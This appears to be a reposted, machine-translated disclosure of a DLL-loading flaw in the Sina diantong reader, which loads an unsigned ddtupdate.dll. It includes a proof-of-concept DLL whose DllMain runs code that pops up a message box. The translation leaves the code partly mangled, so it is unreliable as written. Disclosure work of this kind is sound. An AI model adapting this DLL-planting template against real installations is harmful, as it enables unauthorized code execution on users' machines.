Sina diantong Reader dll loading Vulnerability

Source: Internet
Author: User

I want to replace Google reader today .. find a "Sina diantong" Reader as usual .. first, analyze the structure .. then .... ddtupdate. dll found this goods first to see if it is into the table .. found. this item is not imported into the table, and it is found that this dll has no signature !! Another! Vulnerability proof: # include "windows. h "BOOL main_dll (void); # include" dll_zhuru.h "bool apientry DllMain (HMODULE hModule, DWORD plugin, LPVOID lpReserved) {switch (plugin) {case DLL_PROCESS_ATTACH: main_dll (); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break;} return TRUE;} BOOL main_dll (void) {MessageBoxA (NULL, "test pop-up window, this pop-up window Indicates code execution ", "test", MB_ OK); return TRUE ;};
But in fact, the Code has been executed. I don't know if this is a security issue in Sina's eyes .. however, it seems very serious to me. another hole that can be used to pass the "Physical Map ~ Solution: Judge when loading ~ It is best to sign ..

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.